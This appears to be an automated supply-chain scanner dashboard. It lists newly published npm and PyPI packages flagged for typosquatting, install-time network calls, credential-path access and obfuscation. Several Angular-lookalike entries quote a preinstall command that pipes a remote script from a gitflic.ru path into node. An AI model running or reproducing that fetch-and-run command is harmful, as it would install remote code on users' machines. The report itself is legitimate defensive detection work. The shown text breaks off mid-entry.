Automated package-squatting & slopsquatting detection signals across PyPI and npm — these are automated, unconfirmed signals. Fast adoption alone isn't evidence of wrongdoing; use this to find candidates worth a second look, not to accuse anyone.

Packages published in the last 90 days, ranked by downloads-per-day since publish — only packages with known download data are shown.

Search & filter syntax reference
Same email:, domain:, keyword:, version:, age:<6h filters as the other tabs (age: here filters on top of this tab's own 90-day cutoff, not instead of it).
PackageEcosystem Verdict Score Growth/day Downloads/mo Lines Age Targeted
0.1.19
npm Very Risky 95 ↑ 0.0/day 0 60 6h botmaker
Author: Botmaker Team
Package purpose: Botmaker CLI - Command line interface for Botmaker platform
Claimed homepage: https://github.com/botmaker-org/botmaker-cli#readme
Matched naming pattern: npm-botmaker-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 60 lines, 1.7 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/postinstall.js:2
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/postinstall.js:37
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/postinstall.js:1
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/postinstall.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor 'botmaker' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (140 -> 70) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.0
npm Very Risky 87 ↑ 0.0/day 0 92 10h pixelsteer
Author: Unknown
Package purpose: Point-and-click visual feedback for frontend coding agents
Claimed homepage: https://pixelsteer.com
Matched naming pattern: npm-pixelsteer-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 92 lines, 3.5 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/install.js'
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/install.js:49
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/install.js:14
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/pixelsteer.js:18
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/scripts/install.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor 'pixelsteer' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (125 -> 62) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.4.1
npm Very Risky 75 ↑ 0.0/day 0 4,650 11h pi
Author: Nyarlathoteppppp
Package purpose: Durable Pi Coding Agent tasks over MCP with background execution, steering, and crash recovery
Claimed homepage: https://github.com/Nyarlathoteppppp/pi-durabletask-mcp#readme
Matched naming pattern: npm-pi-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4650 lines, 226.3 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/link-pi-sdk.mjs'
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/statusline/cli.js:25 (+1 more occurrence(s) elsewhere)
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in package/dist/tools/init.js:121
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/pi/search.js:16 (+2 more occurrence(s) elsewhere)
  • INFOSubstantial functional codebase (4650 LOC across 59 file(s)).
  • INFOPackage affiliated with trusted vendor 'pi' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (65 -> 32) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.4.2-1
npm Very Risky 95 ↑ 0.0/day 0 540 13h @ohos
Author: Unknown
Package purpose: Bun is a fast all-in-one JavaScript runtime.
Claimed homepage: https://bun.com
Matched naming pattern: npm-@ohos-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 540 lines, 17.1 kB (MODERATE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node install.js'
  • HIGHBUNDLED_NATIVE_BINARY: Unexpected compiled binary 'package/bin/bunx.exe' in npm tarball
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/install.js:249
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/install.js:252
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/install.js:63
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/install.js:48

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.0
npm Very Risky 122 ↑ 0.0/day 0 21 24h @imgauravbhosale/malwhunter
Author: Unknown
Package purpose: SAFE, INERT test fixture for exercising MalwHunter (https://github.com/ImGauravbhosale/Malwhunter) in a real CI pipeline. Every pattern in this package is written to match known npm supply-chain malware SHAPES (install-script abuse, bulk env enumeration,
Matched naming pattern: npm-@imgauravbhosale/malwhunter-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 21 lines, 934 Bytes (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node -e "console.log('[malwhunter-ci-demo-fixture] inert postinstall — pattern-match test only, no real payload')"'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Discord Webhook' found in package/index.js:22
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:16
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/index.js:11
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in package/index.js:11

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.0
npm Very Risky 75 ↑ 0.0/day 0 40,924 24h agent
Author: Unknown
Package purpose: MCP server for Agent Escrow: let your agent hire other agents on Solana and pay only for work that passes a committed acceptance test.
Claimed homepage: https://aralroca.github.io/agent-escrow/
Matched naming pattern: npm-agent-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 40924 lines, 1.6 MB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in package/dist/index.js:40810
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/dist/index.js:2954
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/index.js:33682
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/dist/index.js:11322
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/dist/index.js:9128
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.js:32330

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.2.0
pypi Very Risky 165 ↑ 0.0/day 0 1,482 24h safekeep
Author: Unknown
Package purpose: Selective always-on backups for macOS: fswatch-driven copy of allow-listed files, never deletes
Claimed homepage: https://pypi.org/project/safekeep/
Matched naming pattern: python-safekeep-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 1482 lines, 74.2 kB (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in safekeep-0.2.0/safekeep/cli.py:194
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in safekeep-0.2.0/safekeep/cli.py:240
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in safekeep-0.2.0/safekeep/cli.py
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in safekeep-0.2.0/safekeep/daemon.py:431
  • INFOSubstantial functional codebase (1482 LOC across 7 file(s)).

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on PyPI →
1.0.0
npm Very Risky 95 ↑ 0.0/day 0 214 25h core
Author: corejs-utils
Package purpose: Core JavaScript utilities for Node.js
Claimed homepage: https://github.com/corejs-utils/node-buffer-core#readme
Matched naming pattern: npm-core-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 214 lines, 7.5 kB (MODERATE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node init.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/init.js:12
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/init.js:97
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/init.js:8
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/init.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor 'core' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (140 -> 70) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.4.0
npm Very Risky 95 ↑ 0.0/day 0 96 27h @codeteck/agentml
Author: Nom-nom-hub
Package purpose: AI-native markup language and CLI for agent execution contracts
Claimed homepage: https://nom-nom-hub.github.io/agentml/
Matched naming pattern: npm-@codeteck/agentml-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 96 lines, 3.9 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node ./bin/install.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/agentml.js:6 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/agentml.js:20 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/bin/install.js:8
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/bin/install.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor '@codeteck/agentml' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (140 -> 70) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
3.3.0
npm Very Risky 125 ↑ 0.0/day 0 6,252 33h qianshou
Author: qianshou-master
Package purpose: Qianshou Master — interactive AI coding assistant in the terminal
Matched naming pattern: npm-qianshou-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 6252 lines, 8.4 MB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/run-parallel.mjs scripts/postinstall.cjs scripts/setup-chrome-mcp.mjs'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/scripts/postinstall.cjs:24
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/postinstall.cjs:127 (+5 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/postinstall.cjs:155 (+10 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/postinstall.cjs:42 (+130 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.67
npm Very Risky 95 ↑ 0.0/day 0 9,724 37h @nagular/core
Author: Unknown
Package purpose: providing general utility for Npm
Matched naming pattern: npm-@nagular/core-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 9724 lines, 303.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/lib/http/Loader.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/credentials/Manager.js:79 (+1 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.67
npm Very Risky 95 ↑ 0.0/day 0 9,724 37h @angularr/core
Author: Unknown
Package purpose: providing general utility for Npm
Matched naming pattern: npm-@angularr/core-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 9724 lines, 303.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/lib/http/Loader.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/credentials/Manager.js:79 (+1 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
22.2.1
npm Very Risky 107 ↑ 0.0/day 0 19,039 37h @angularr/cli
Author: Angular Authors
Package purpose: providing general utility for Npm
Claimed homepage: https://github.com/angular/angular-cli
Matched naming pattern: npm-@angularr/cli-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 19039 lines, 810.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHPackage registered with suspiciously high major version (v22.2.1, major 22) despite recent registration (0 days ago, 1 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/bootstrap.js:24 (+8 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/src/commands/mcp/tools/doc-search.js:124

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
22.2.1
npm Very Risky 107 ↑ 0.0/day 0 19,039 37h @angulra/cli
Author: Angular Authors
Package purpose: CLI tool for Angular
Claimed homepage: https://github.com/angular/angular-cli
Matched naming pattern: npm-@angulra/cli-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 19039 lines, 810.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHPackage registered with suspiciously high major version (v22.2.1, major 22) despite recent registration (0 days ago, 1 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/bootstrap.js:24 (+8 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/src/commands/mcp/tools/doc-search.js:124

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.67
npm Very Risky 95 ↑ 0.0/day 0 9,724 37h @angulra/core
Author: Unknown
Package purpose: Core Libs
Matched naming pattern: npm-@angulra/core-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 9724 lines, 303.8 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/lib/http/Loader.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/credentials/Manager.js:79 (+1 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.0
npm Very Risky 87 ↑ 0.0/day 0 133 49h @carlos
Author: Carlos Burelo
Package purpose: El gestor de procesos definitivo para Windows Server escrito en Rust
Claimed homepage: https://github.com/carlos-burelo/wyrm#readme
Matched naming pattern: npm-@carlos-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 133 lines, 4.5 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/install.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/cli.js:4
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/scripts/install.js:7
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/install.js:73
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/scripts/install.js, which makes network calls and executes/decodes/reads secrets
  • INFOPackage affiliated with trusted vendor '@carlos' (provenance:npm_slsa_sigstore). Applied 50% threat score dampening (125 -> 62) to reduce false positives while retaining hijack/takeover detection.

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.4.7
npm Very Risky 97 ↑ 0.0/day 0 2,406 51h chai
Author: Robert King (hello@jsonspack.com)
Package purpose: Chai integration providing general utility for Npm
Matched naming pattern: npm-chai-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 2406 lines, 93.7 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/index.js:4
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/lib/initializeCaller.js:13
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/lib/initializeCaller.js:8
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/lib/initializeCaller.js:7
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/initializeCaller.js:9 (+2 more occurrence(s) elsewhere)

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.2.0
npm Very Risky 97 ↑ 0.0/day 0 56,599 55h @tekma/cli
Author: Unknown
Package purpose: Tekma CLI, recorder and reader skills, and automatic agent setup
Claimed homepage: https://tekma.dev
Matched naming pattern: npm-@tekma/cli-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 56599 lines, 1.8 MB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/dist/index.mjs:11807 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/index.mjs:7035
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.mjs:3204 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/index.mjs:2153 (+1 more occurrence(s) elsewhere)
  • HIGHSUSPICIOUS_OBFUSCATION: 'Layered Base64 and Decompress Pipeline' found in package/dist/index.mjs:9561

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.1.4
npm Very Risky 75 ↑ 0.0/day 0 4,598 57h @leahd/co
Author: Unknown
Package purpose: 面向 Codex 的 pi SDK 子代理与 pi-tui 监控器
Matched naming pattern: npm-@leahd/co-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4598 lines, 253.6 kB (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node scripts/npm-postinstall.mjs'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/cli.js:39 (+11 more occurrence(s) elsewhere)
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in package/dist/instructions.js:5
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/install.mjs:27
  • INFOSubstantial functional codebase (4598 LOC across 41 file(s)).

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
0.0.2
npm Very Risky 95 ↑ 0.0/day 0 78 60h @rofy/cli
Author: Unknown
Package purpose: Rofy CLI: make images and videos with Rofy from a terminal.
Claimed homepage: https://github.com/rofy-ai/rofy-cli#readme
Matched naming pattern: npm-@rofy/cli-general
Official vendor account: No — publisher domain doesn't match the brand it names
Weekly downloads: 0 (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 78 lines, 3.5 kB (TINY_CODEBASE)
Automated signals flagged:
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node install.js'
  • HIGHSOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/install.js:24
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/install.js:18 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/rofy.js:3
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/rofy.js:7
  • CRITICALINSTALL_TIME_NETWORK_SOCKET: 'postinstall' script runs package/install.js, which makes network calls and executes/decodes/reads secrets

Fast growth plus these signals is worth a look; fast growth alone is not evidence of wrongdoing.

View package on npm →
1.0.0
npm Very Risky 90 ↑ 0.0/day 0 9,058 68h smoothness
Author: Den Odell
